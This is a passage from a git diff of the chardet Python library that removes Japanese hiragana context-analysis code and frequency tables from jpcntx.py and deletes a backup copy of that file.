-(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3), -(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3), -(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3), -(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5), -(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4), -(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5), -(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3), -(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4), -(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4), -(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4), -(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1), -(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0), -(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3), -(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0), -(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3), -(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3), -(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5), -(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4), -(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5), -(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3), -(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3), -(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3), -(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3), -(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4), -(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4), -(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2), -(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3), -(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3), -(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3), -(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3), -(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4), -(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3), -(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4), -(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3), -(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3), -(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4), -(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4), -(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3), -(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4), -(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4), -(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3), -(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4), -(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4), -(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4), -(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3), -(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2), -(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2), -(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3), -(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3), -(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5), -(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3), -(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4), -(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4), -(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1), -(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2), -(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3), -(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1), -) - -class JapaneseContextAnalysis: - def __init__(self): - self.reset() - - def reset(self): - self._mTotalRel = 0 # total sequence received - self._mRelSample = [0] * NUM_OF_CATEGORY # category counters, each interger counts sequence in its category - self._mNeedToSkipCharNum = 0 # if last byte in current buffer is not the last byte of a character, we need to know how many bytes to skip in next buffer - self._mLastCharOrder = -1 # The order of previous char - self._mDone = False # If this flag is set to True, detection is done and conclusion has been made - - def feed(self, aBuf, aLen): - if self._mDone: return - - # The buffer we got is byte oriented, and a character may span in more than one - # buffers. In case the last one or two byte in last buffer is not complete, we - # record how many byte needed to complete that character and skip these bytes here. - # We can choose to record those bytes as well and analyse the character once it - # is complete, but since a character will not make much difference, by simply skipping - # this character will simply our logic and improve performance. - i = self._mNeedToSkipCharNum - while i < aLen: - order, charLen = self.get_order(aBuf[i:i+2]) - i += charLen - if i > aLen: - self._mNeedToSkipCharNum = i - aLen - self._mLastCharOrder = -1 - else: - if (order != -1) and (self._mLastCharOrder != -1): - self._mTotalRel += 1 - if self._mTotalRel > MAX_REL_THRESHOLD: - self._mDone = True - break - self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1 - self._mLastCharOrder = order - - def got_enough_data(self): - return self._mTotalRel > ENOUGH_REL_THRESHOLD - - def get_confidence(self): - # This is just one way to calculate confidence. It works well for me. - if self._mTotalRel > MINIMUM_DATA_THRESHOLD: - return (self._mTotalRel - self._mRelSample[0]) / self._mTotalRel - else: - return DONT_KNOW - - def get_order(self, aBuf): - return -1, 1 - -class SJISContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aBuf): - if not aBuf: return -1, 1 - # find out current char's byte length - if ((aBuf[0] >= 0x81) and (aBuf[0] <= 0x9F)) or \ - ((aBuf[0] >= 0xE0) and (aBuf[0] <= 0xFC)): - charLen = 2 - else: - charLen = 1 - - # return its order if it is hiragana - if len(aBuf) > 1: - if (aBuf[0] == 202) and \ - (aBuf[1] >= 0x9F) and \ - (aBuf[1] <= 0xF1): - return aBuf[1] - 0x9F, charLen - - return -1, charLen - -class EUCJPContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aBuf): - if not aBuf: return -1, 1 - # find out current char's byte length - if (aBuf[0] == 0x8E) or \ - ((aBuf[0] >= 0xA1) and (aBuf[0] <= 0xFE)): - charLen = 2 - elif aBuf[0] == 0x8F: - charLen = 3 - else: - charLen = 1 - - # return its order if it is hiragana - if len(aBuf) > 1: - if (aBuf[0] == 0xA4) and \ - (aBuf[1] >= 0xA1) and \ - (aBuf[1] <= 0xF3): - return aBuf[1] - 0xA1, charLen - - return -1, charLen diff --git a/chardet/chardet/jpcntx.py.bak b/chardet/chardet/jpcntx.py.bak deleted file mode 100644 index 93db4a9..0000000 --- a/chardet/chardet/jpcntx.py.bak +++ /dev/null @@ -1,210 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -NUM_OF_CATEGORY = 6 -DONT_KNOW = -1 -ENOUGH_REL_THRESHOLD = 100 -MAX_REL_THRESHOLD = 1000 -MINIMUM_DATA_THRESHOLD = 4 - -# This is hiragana 2-char sequence table, the number in each cell represents its frequency category -jp2CharContext = ( \ -(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1), -(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4), -(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2), -(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4), -(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4), -(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3), -(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3), -(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3), -(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4), -(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3), -(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4), 